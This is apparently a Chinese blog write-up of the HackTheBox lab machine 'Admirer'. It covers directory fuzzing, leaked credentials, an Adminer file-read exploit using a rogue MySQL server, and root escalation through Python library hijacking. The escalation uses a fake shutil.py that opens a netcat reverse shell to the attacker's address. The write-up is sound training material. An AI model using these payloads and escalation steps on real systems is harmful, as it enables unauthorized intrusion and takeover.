文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-05-21   4k

HTB::Admirer Walkthrough

文章首发于 星盟安全 公众号

0x01 Info Card

0x02 Tool and Tips

  • nmap
  • wfuzz
  • adminer exploit
  • python libaray path hijack

0x03 Pentesting

Inital Enumeration

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -Pn -A -T4 -p- 10.10.10.187
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-19 21:49 CEST
Nmap scan report for 10.10.10.187
Host is up (0.014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.67 seconds

FTP不允许匿名登录

1
2
3
4
5
6
7
➜  admirer ftp admirer.htb 
Connected to admirer.htb.
220 (vsFTPd 3.0.3)
Name (admirer.htb:prashant): anonymous
530 Permission denied.
Login failed.
ftp>

访问10.10.10.187/admin-dir返回403 Forbidden,用wfuzz工具扫描目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ.FUZ2Z
Total requests: 61419

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000015592: 200 29 L 39 W 350 Ch "contacts - txt"
000016327: 200 11 L 13 W 136 Ch "credentials - txt"

Total time: 247.8061
Processed Requests: 61419
Filtered Requests: 61417
Requests/sec.: 247.8509

contact.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
##########
# admins #
##########
# Penny
Email: [email protected]


##############
# developers #
##############
# Rajesh
Email: [email protected]

# Amy
Email: [email protected]

# Leonard
Email: [email protected]

credential.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[Bank Account]
waldo.11
Ezy]m27}OREc$

[Internal mail account]
[email protected]
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

用FTP account登录FTP服务器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ftp 10.10.10.187
Connected to admirer.htb.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
dump.sql
html.tar.gz
ftp> get dump.sql
ftp> get html.tar.gz

dump.sql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
-- MySQL dump 10.16  Distrib 10.1.41-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: admirerdb
-- ------------------------------------------------------
-- Server version 10.1.41-MariaDB-0+deb9u1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `items`
--

DROP TABLE IF EXISTS `items`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `items` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`thumb_path` text NOT NULL,
`image_path` text NOT NULL,
`title` text NOT NULL,
`text` text,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `items`
--

LOCK TABLES `items` WRITE;
/*!40000 ALTER TABLE `items` DISABLE KEYS */;
INSERT INTO `items` VALUES (1,'images/thumbs/thmb_art01.jpg','images/fulls/art01.jpg','Visual Art','A pure showcase of skill and emotion.'),(2,'images/thumbs/thmb_eng02.jpg','images/fulls/eng02.jpg','The Beauty and the Beast','Besides the technology, there is also the eye candy...'),(3,'images/thumbs/thmb_nat01.jpg','images/fulls/nat01.jpg','The uncontrollable lightshow','When the sun decides to play at night.'),(4,'images/thumbs/thmb_arch02.jpg','images/fulls/arch02.jpg','Nearly Monochromatic','One could simply spend hours looking at this indoor square.'),(5,'images/thumbs/thmb_mind01.jpg','images/fulls/mind01.jpg','Way ahead of his time','You probably still use some of his inventions... 500yrs later.'),(6,'images/thumbs/thmb_mus02.jpg','images/fulls/mus02.jpg','The outcomes of complexity','Seriously, listen to Dust in Interstellar\'s OST. Thank me later.'),(7,'images/thumbs/thmb_arch01.jpg','images/fulls/arch01.jpg','Back to basics','And centuries later, we want to go back and live in nature... Sort of.'),(8,'images/thumbs/thmb_mind02.jpg','images/fulls/mind02.jpg','We need him back','He might have been a loner who allegedly slept with a pigeon, but that brain...'),(9,'images/thumbs/thmb_eng01.jpg','images/fulls/eng01.jpg','In the name of Science','Some theories need to be proven.'),(10,'images/thumbs/thmb_mus01.jpg','images/fulls/mus01.jpg','Equal Temperament','Because without him, music would not exist (as we know it today).');
/*!40000 ALTER TABLE `items` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2019-12-02 20:24:15

解压html.tar.gz

1
2
3
4
5
6
7
8
9
# kali @ kali in ~/HackTheBox/Admirer/html [12:51:51] 
$ ls -l
total 28
drwxr-x--- 6 kali kali 4096 6月 7 2019 assets
drwxr-x--- 4 kali kali 4096 12月 3 04:29 images
-rw-r----- 1 kali kali 4613 12月 4 04:20 index.php
-rw-r----- 1 kali kali 134 12月 2 05:31 robots.txt
drwxr-x--- 2 kali kali 4096 12月 3 01:50 utility-scripts
drwxr-x--- 2 kali kali 4096 12月 3 01:25 w4ld0s_s3cr3t_d1r

utility-scripts目录下的文件

1
2
3
4
5
6
7
8
9
# kali @ kali in ~/HackTheBox/Admirer/html/utility-scripts [12:53:54] 
$ ls -la
total 24
drwxr-x--- 2 kali kali 4096 12月 3 01:50 .
drwx------ 6 kali kali 4096 5月 20 14:29 ..
-rw-r----- 1 kali kali 1795 12月 3 01:48 admin_tasks.php
-rw-r----- 1 kali kali 401 12月 2 06:28 db_admin.php
-rw-r----- 1 kali kali 20 11月 30 03:32 info.php
-rw-r----- 1 kali kali 53 12月 3 01:40 phptest.php

admin_tasks.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<html>
<head>
<title>Administrative Tasks</title>
</head>
<body>
<h3>Admin Tasks Web Interface (v0.01 beta)</h3>
<?php
// Web Interface to the admin_tasks script
//
if(isset($_REQUEST['task']))
{
$task = $_REQUEST['task'];
if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
$task == '5' || $task == '6' || $task == '7')
{
/***********************************************************************************
Available options:
1) View system uptime
2) View logged in users
3) View crontab (current user only)
4) Backup passwd file (not working)
5) Backup shadow file (not working)
6) Backup web data (not working)
7) Backup database (not working)

NOTE: Options 4-7 are currently NOT working because they need root privileges.
I'm leaving them in the valid tasks in case I figure out a way
to securely run code as root from a PHP page.
************************************************************************************/
echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
}
else
{
echo("Invalid task.");
}
}
?>

<p>
<h4>Select task:</p>
<form method="POST">
<select name="task">
<option value=1>View system uptime</option>
<option value=2>View logged in users</option>
<option value=3>View crontab</option>
<option value=4 disabled>Backup passwd file</option>
<option value=5 disabled>Backup shadow file</option>
<option value=6 disabled>Backup web data</option>
<option value=7 disabled>Backup database</option>
</select>
<input type="submit">
</form>
</body>
</html>

db_admin.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>

info.php

1
<?php phpinfo(); ?>

phptest.php

1
2
3
<?php
echo("Just a test to see if PHP works.");
?>

暴露了一个数据库的用户名和密码。但是后面的注释提示a better open source alternative,用wfuzz扫描该目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# kali @ kali in ~/HackTheBox/Admirer/html/utility-scripts [12:53:55] 
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Total requests: 61419

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000005617: 200 51 L 235 W 4156 Ch "adminer - php"
000028852: 200 964 L 4976 W 84023 Ch "info - php"
000041602: 200 0 L 8 W 32 Ch "phptest - php"

Total time: 266.5721
Processed Requests: 61419
Filtered Requests: 61416
Requests/sec.: 230.4028

访问http://10.10.10.178/utility-scripts/adminer.php

Getting User Access

用之前得到的用户名和密码尝试登录失败,Google Adminer database manager,得到一种利用方式:

Serious Vulnerability Discovered in Adminer database Administration Tool

简单来讲就是,先配置本地的MySQL数据库,允许远程连接登录,然后用靶机上的adminer database manager连接我们本地的数据库,再将靶机的敏感文件通过adminer写入数据库,最后从本地读取敏感文件。

在kali上用root登录MySQL,新建一个数据库:

1
MariaDB [(none)]> CREATE DATABASE admirer;

创建一个用户,如果想让该用户可以从任意远程主机登陆,可以使用通配符%

1
MariaDB [(none)]> CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';

给新用户授权:

1
MariaDB [(none)]> GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';

重新加载权限:

1
MariaDB [(none)]> FLUSH PRIVILEGES;

创建新数据表test

1
MariaDB [(admirer)]> create table test(data VARCHAR(255));

配置数据库使得能远程连接,修改/etc/mysql/mariadb.conf.d/50-server.cnf

1
bind-address      =0.0.0.0

重启MySQL服务:

1
systemctl restart mysql

在本地验证能否登录:

1
2
3
4
5
6
7
8
9
10
11
$ mysql -h localhost -u demo -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 42
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

成功登录,在adminer页面远程登录:

It Work!!!

验证能否使用load data infile语句读取文件:

1
2
3
load data local infile '/etc/passwd'
into table test
fields terminated by "/n"

看一下phpinfo():

open_basedir限制了根路径,尝试读取index.php文件:

读取成功,用Select语句显示:

得到waldo: &<h5b~yK3F#{PaPB&dA}{H>凭证用来登录SSH

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ ssh [email protected]
[email protected]'s password:
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Wed Apr 29 10:56:59 2020 from 10.10.14.3
[email protected]:~$ id
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
w[email protected]:~$ cat user.txt
7222------------------------2c18

Getting Root Access

查看waldo能运行的脚本或程序

1
2
3
4
5
6
7
[email protected]:~$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh

admin_tasks.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#!/bin/bash

view_uptime()
{
/usr/bin/uptime -p
}

view_users()
{
/usr/bin/w
}

view_crontab()
{
/usr/bin/crontab -l
}

backup_passwd()
{
if [ "$EUID" -eq 0 ]
then
echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
/bin/cp /etc/passwd /var/backups/passwd.bak
/bin/chown root:root /var/backups/passwd.bak
/bin/chmod 600 /var/backups/passwd.bak
echo "Done."
else
echo "Insufficient privileges to perform the selected operation."
fi
}

backup_shadow()
{
if [ "$EUID" -eq 0 ]
then
echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
/bin/cp /etc/shadow /var/backups/shadow.bak
/bin/chown root:shadow /var/backups/shadow.bak
/bin/chmod 600 /var/backups/shadow.bak
echo "Done."
else
echo "Insufficient privileges to perform the selected operation."
fi
}

backup_web()
{
if [ "$EUID" -eq 0 ]
then
echo "Running backup script in the background, it might take a while..."
/opt/scripts/backup.py &
else
echo "Insufficient privileges to perform the selected operation."
fi
}

backup_db()
{
if [ "$EUID" -eq 0 ]
then
echo "Running mysqldump in the background, it may take a while..."
#/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
/usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
else
echo "Insufficient privileges to perform the selected operation."
fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
option=$1
case $option in
1) view_uptime ;;
2) view_users ;;
3) view_crontab ;;
4) backup_passwd ;;
5) backup_shadow ;;
6) backup_web ;;
7) backup_db ;;

*) echo "Unknown option." >&2
esac

exit 0
fi


# Interactive way, to be called from the command line
options=("View system uptime"
"View logged in users"
"View crontab"
"Backup passwd file"
"Backup shadow file"
"Backup web data"
"Backup DB"
"Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
case $REPLY in
1) view_uptime ; break ;;
2) view_users ; break ;;
3) view_crontab ; break ;;
4) backup_passwd ; break ;;
5) backup_shadow ; break ;;
6) backup_web ; break ;;
7) backup_db ; break ;;
8) echo "Bye!" ; break ;;

*) echo "Unknown option." >&2
esac
done

exit 0

在几个需要root权限运行的函数中,backup_web()调用了同目录下的backup.py脚本文件。

backup.py

1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

这里引用了shutil模块中的make_archive函数,这个地方得用Python库劫持的方法提权:

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

查看当前Python库的路径:

1
2
3
4
5
6
7
8
[email protected]:/opt/scripts$ python3 -c 'import sys; print ("\n".join(sys.path))'

/usr/lib/python35.zip
/usr/lib/python3.5
/usr/lib/python3.5/plat-x86_64-linux-gnu
/usr/lib/python3.5/lib-dynload
/usr/local/lib/python3.5/dist-packages
/usr/lib/python3/dist-packages

但是我们都没有权限写入文件到这些路径,但是我们可以使用PYTHONPATH来临时更改Python库的路径

首先伪造一个shutil.py库文件

1
2
3
4
5
6
7
8
9
[email protected]:/opt/scripts$ cd
[email protected]:~$ mkdir fakelib
[email protected]:~$ cd fakelib/
[email protected]:~/fakelib$ nano shutil.py
[email protected]:~/fakelib$ cat shutil.py
import os

def make_archive(a, b, c):
os.system("nc 10.10.14.4 1234 -e '/bin/sh'")

靶机运行脚本文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[email protected]:~/fakelib$ sudo PYTHONPATH=~/fakelib /opt/scripts/admin_tasks.sh 
[sudo] password for waldo:

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...

本机上监听1234端口

1
2
3
4
5
6
7
8
9
10
11
12
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.187] 58946
python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/home/waldo/fakelib# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/waldo/fakelib# cd
cd
[email protected]:~# cat root.txt
cat root.txt
c6af------------------------4645

ROOTED!!!

0x04 Summary

  • nmap扫描出 admin-dir目录,访问发现403 Forbidden
  • 使用wfuzz工具扫描出 contacts.txtcredentials.txt两个文件
  • credentials.txt文件暴露出来的FTP用户名和密码登录靶机FTP服务
  • 下载dump.sql文件和html.tar.gz并解压
  • utility-scripts目录中有MySQL的登录名和密码
  • wfuzzutility-scripts目录发现 adminer.php
  • 上面用户名和密码不能登录adminer
  • Google发现一个adminer漏洞的公开利用方式
  • 在本地运行MySQL服务,并且新建用户允许任意主机接入,配置MySQL外部可访问
  • 用靶机的adminer服务连接本地数据库
  • 将index.php写入本地数据库
  • 得到waldo的用户名和密码,用SSH登录
  • 拿到user.txt
  • 运行sudo -l命令,查看有权限执行的脚本admin_task.sh
  • admin_task.sh会调用backup.py
  • Python library path hijacking 提权
  • 伪造shutil.py,写入reverse shell
  • sudo运行admin_task.sh时指定 PYTHONPATH
  • 拿到 root.txt

0x05 Reference

Topic Url
Adminer-database Manager https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
Adminer-Database Manager https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability
Configuration of Mysql https://www.digitalocean.com/community/tutorials/how-to-allow-remote-access-to-mysql
Configuration of Mysql https://www.digitalocean.com/community/tutorials/how-to-create-a-new-user-and-grant-permissions-in-mysql
Python Path Hijacting https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
Copyright © ca01h 2019-2020 | 本站总访问量